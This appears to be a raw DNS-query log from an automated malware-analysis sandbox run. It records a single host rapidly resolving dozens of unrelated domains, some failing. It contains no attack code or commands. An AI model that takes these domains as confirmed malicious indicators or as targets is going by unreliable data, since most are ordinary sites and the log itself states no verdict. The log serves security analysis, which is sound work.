                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.121243000 CET8.8.8.8192.168.2.50x1cfcNo error (0)www.hyabmagneter.se104.21.69.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.121243000 CET8.8.8.8192.168.2.50x1cfcNo error (0)www.hyabmagneter.se172.67.209.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.175955057 CET8.8.8.8192.168.2.50xc278No error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.223340988 CET8.8.8.8192.168.2.50xcd44No error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.223340988 CET8.8.8.8192.168.2.50xcd44No error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.223340988 CET8.8.8.8192.168.2.50xcd44No error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.230197906 CET8.8.8.8192.168.2.50xa6c4Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.255644083 CET8.8.8.8192.168.2.50xcc83No error (0)cpmteam.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.255644083 CET8.8.8.8192.168.2.50xcc83No error (0)cpmteam.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.267591953 CET8.8.8.8192.168.2.50x2b10No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.302273989 CET8.8.8.8192.168.2.50x6393No error (0)bd-style.com107.165.223.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.353916883 CET8.8.8.8192.168.2.50x6732No error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.356420994 CET8.8.8.8192.168.2.50x3945No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.420897961 CET8.8.8.8192.168.2.50xecedNo error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.420897961 CET8.8.8.8192.168.2.50xecedNo error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.442476034 CET8.8.8.8192.168.2.50x9a07No error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.442476034 CET8.8.8.8192.168.2.50x9a07No error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.463177919 CET8.8.8.8192.168.2.50x70eeNo error (0)hyabmagneter.se104.21.69.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.463177919 CET8.8.8.8192.168.2.50x70eeNo error (0)hyabmagneter.se172.67.209.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.552788973 CET8.8.8.8192.168.2.50xf511No error (0)hyabmagneter.se172.67.209.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.552788973 CET8.8.8.8192.168.2.50xf511No error (0)hyabmagneter.se104.21.69.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.556413889 CET8.8.8.8192.168.2.50xc69dName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.613570929 CET8.8.8.8192.168.2.50x8029No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.615319014 CET8.8.8.8192.168.2.50x8fd5No error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.710936069 CET8.8.8.8192.168.2.50x3bdbNo error (0)sanfotek.net97.74.42.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.718122005 CET8.8.8.8192.168.2.50xc837No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.734436989 CET8.8.8.8192.168.2.50xcddName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.736035109 CET8.8.8.8192.168.2.50x2f6dNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.736035109 CET8.8.8.8192.168.2.50x2f6dNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.740008116 CET8.8.8.8192.168.2.50xc561No error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.740008116 CET8.8.8.8192.168.2.50xc561No error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.788280964 CET8.8.8.8192.168.2.50x1d88No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.865916967 CET8.8.8.8192.168.2.50xb9faNo error (0)www.hyabmagneter.se172.67.209.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.865916967 CET8.8.8.8192.168.2.50xb9faNo error (0)www.hyabmagneter.se104.21.69.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.947480917 CET8.8.8.8192.168.2.50x7edaNo error (0)juso-gr.ch172.67.163.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.947480917 CET8.8.8.8192.168.2.50x7edaNo error (0)juso-gr.ch104.21.50.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.950928926 CET8.8.8.8192.168.2.50xab3No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.950928926 CET8.8.8.8192.168.2.50xab3No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.951090097 CET8.8.8.8192.168.2.50xbc65No error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.951090097 CET8.8.8.8192.168.2.50xbc65No error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.984769106 CET8.8.8.8192.168.2.50x1063No error (0)sanfotek.net97.74.42.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:07.984806061 CET8.8.8.8192.168.2.50xe0aNo error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.023443937 CET8.8.8.8192.168.2.50xd625No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.033987045 CET8.8.8.8192.168.2.50x7aefName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.038567066 CET8.8.8.8192.168.2.50x4440No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.038567066 CET8.8.8.8192.168.2.50x4440No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.045737982 CET8.8.8.8192.168.2.50xe4f3No error (0)www.hyabmagneter.se104.21.69.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.045737982 CET8.8.8.8192.168.2.50xe4f3No error (0)www.hyabmagneter.se172.67.209.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.060256004 CET8.8.8.8192.168.2.50xf169Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.088814020 CET8.8.8.8192.168.2.50x1d26No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.088814020 CET8.8.8.8192.168.2.50x1d26No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.091514111 CET8.8.8.8192.168.2.50xecd1Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.103034019 CET8.8.8.8192.168.2.50x61d7No error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.199440002 CET8.8.8.8192.168.2.50xd101No error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.226454020 CET8.8.8.8192.168.2.50x7284Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.313373089 CET8.8.8.8192.168.2.50x9cc3No error (0)eos-i.commacx1980.qy56.supcname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.313373089 CET8.8.8.8192.168.2.50x9cc3No error (0)macx1980.qy56.supcname.commfddos.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.313373089 CET8.8.8.8192.168.2.50x9cc3No error (0)mfddos.datacname.com15.204.18.132.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.313373089 CET8.8.8.8192.168.2.50x9cc3No error (0)15.204.18.132.datacname.com15.204.18.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.351865053 CET8.8.8.8192.168.2.50xc10aNo error (0)shesfit.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.351865053 CET8.8.8.8192.168.2.50xc10aNo error (0)shesfit.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.398271084 CET8.8.8.8192.168.2.50x88c2No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.414336920 CET8.8.8.8192.168.2.50xd733No error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.443900108 CET8.8.8.8192.168.2.50x6efdNo error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.453906059 CET8.8.8.8192.168.2.50xa013Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.470470905 CET8.8.8.8192.168.2.50xbd20Name error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.475002050 CET8.8.8.8192.168.2.50xe84dNo error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.479702950 CET8.8.8.8192.168.2.50xe6bNo error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.479702950 CET8.8.8.8192.168.2.50xe6bNo error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.479702950 CET8.8.8.8192.168.2.50xe6bNo error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.552337885 CET8.8.8.8192.168.2.50xe362Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.589359045 CET8.8.8.8192.168.2.50xe5feName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.623033047 CET8.8.8.8192.168.2.50x3a56Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.704385996 CET8.8.8.8192.168.2.50x8853No error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.704385996 CET8.8.8.8192.168.2.50x8853No error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.704385996 CET8.8.8.8192.168.2.50x8853No error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.712090969 CET8.8.8.8192.168.2.50x5709No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.796528101 CET8.8.8.8192.168.2.50x2f50No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.796528101 CET8.8.8.8192.168.2.50x2f50No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.796528101 CET8.8.8.8192.168.2.50x2f50No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.937160015 CET8.8.8.8192.168.2.50xd4dNo error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:08.945663929 CET8.8.8.8192.168.2.50xf0d5No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.129477978 CET8.8.8.8192.168.2.50xc99bNo error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.138716936 CET8.8.8.8192.168.2.50x481cNo error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.147716045 CET8.8.8.8192.168.2.50x6a5fNo error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.208007097 CET8.8.8.8192.168.2.50x2529Name error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.214118004 CET8.8.8.8192.168.2.50xa0a0No error (0)cpmteam.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.214118004 CET8.8.8.8192.168.2.50xa0a0No error (0)cpmteam.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.297430038 CET8.8.8.8192.168.2.50x2a79No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.312886953 CET8.8.8.8192.168.2.50x84aNo error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.339121103 CET8.8.8.8192.168.2.50x9dabNo error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.339121103 CET8.8.8.8192.168.2.50x9dabNo error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.382646084 CET8.8.8.8192.168.2.50x161bNo error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.415556908 CET8.8.8.8192.168.2.50x4464No error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.430129051 CET8.8.8.8192.168.2.50xa330No error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.430129051 CET8.8.8.8192.168.2.50xa330No error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.480494022 CET8.8.8.8192.168.2.50x9897No error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.550934076 CET8.8.8.8192.168.2.50x7a62No error (0)revoldia.net45.200.235.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.593430042 CET8.8.8.8192.168.2.50x90e7No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.673350096 CET8.8.8.8192.168.2.50x257bNo error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.705888033 CET8.8.8.8192.168.2.50x4669No error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.705888033 CET8.8.8.8192.168.2.50x4669No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.705888033 CET8.8.8.8192.168.2.50x4669No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.705888033 CET8.8.8.8192.168.2.50x4669No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.709589958 CET8.8.8.8192.168.2.50x2528No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.857749939 CET8.8.8.8192.168.2.50xf239No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.857749939 CET8.8.8.8192.168.2.50xf239No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.900321007 CET8.8.8.8192.168.2.50xaef3Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.928786039 CET8.8.8.8192.168.2.50x8366Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.984245062 CET8.8.8.8192.168.2.50x45faNo error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.984245062 CET8.8.8.8192.168.2.50x45faNo error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:09.997648954 CET8.8.8.8192.168.2.50x38f9Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.058785915 CET8.8.8.8192.168.2.50x2a75No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.073229074 CET8.8.8.8192.168.2.50xe6b5No error (0)tabbles.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.073229074 CET8.8.8.8192.168.2.50xe6b5No error (0)tabbles.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.130867958 CET8.8.8.8192.168.2.50x8168No error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.184546947 CET8.8.8.8192.168.2.50x4706No error (0)webways.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.184546947 CET8.8.8.8192.168.2.50x4706No error (0)webways.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.203751087 CET8.8.8.8192.168.2.50x31f1Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.289544106 CET8.8.8.8192.168.2.50xc629No error (0)x96.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.289544106 CET8.8.8.8192.168.2.50xc629No error (0)x96.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.300007105 CET8.8.8.8192.168.2.50xe5cNo error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.300007105 CET8.8.8.8192.168.2.50xe5cNo error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.321059942 CET8.8.8.8192.168.2.50xf2a1No error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.321059942 CET8.8.8.8192.168.2.50xf2a1No error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.321095943 CET8.8.8.8192.168.2.50xe67fNo error (0)vfcindia.com68.71.135.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.321867943 CET8.8.8.8192.168.2.50xdaa4Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.350970030 CET8.8.8.8192.168.2.50xceadNo error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.364074945 CET8.8.8.8192.168.2.50x2978No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.364074945 CET8.8.8.8192.168.2.50x2978No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.364074945 CET8.8.8.8192.168.2.50x2978No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.453324080 CET8.8.8.8192.168.2.50x774aName error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.799586058 CET8.8.8.8192.168.2.50x244bServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.878418922 CET8.8.8.8192.168.2.50x2febNo error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.898466110 CET8.8.8.8192.168.2.50xab23Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.921675920 CET8.8.8.8192.168.2.50x953cName error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.939085007 CET8.8.8.8192.168.2.50xe7eaServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.958338976 CET8.8.8.8192.168.2.50x3faNo error (0)ifesnet.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.958338976 CET8.8.8.8192.168.2.50x3faNo error (0)ifesnet.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.962224960 CET8.8.8.8192.168.2.50x7211Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.975168943 CET8.8.8.8192.168.2.50xa0ceNo error (0)gcss.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.980942011 CET8.8.8.8192.168.2.50x1fc8Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.993366003 CET8.8.8.8192.168.2.50x753No error (0)pcoyuncu.com213.142.131.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.993386984 CET8.8.8.8192.168.2.50xd6fNo error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.993386984 CET8.8.8.8192.168.2.50xd6fNo error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:10.993386984 CET8.8.8.8192.168.2.50xd6fNo error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.000603914 CET8.8.8.8192.168.2.50x1019Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.010021925 CET8.8.8.8192.168.2.50x4d6cNo error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.010021925 CET8.8.8.8192.168.2.50x4d6cNo error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.028609037 CET8.8.8.8192.168.2.50xb1dbServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.045187950 CET8.8.8.8192.168.2.50x7f4dServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.062230110 CET8.8.8.8192.168.2.50xf7f2No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.062230110 CET8.8.8.8192.168.2.50xf7f2No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.191570044 CET8.8.8.8192.168.2.50xf926No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.219531059 CET8.8.8.8192.168.2.50x26bcNo error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.326699018 CET8.8.8.8192.168.2.50x7d2eNo error (0)workplus.hu188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.326699018 CET8.8.8.8192.168.2.50x7d2eNo error (0)workplus.hu188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.422341108 CET8.8.8.8192.168.2.50xa25bServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:11.535537004 CET8.8.8.8192.168.2.50x4032No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
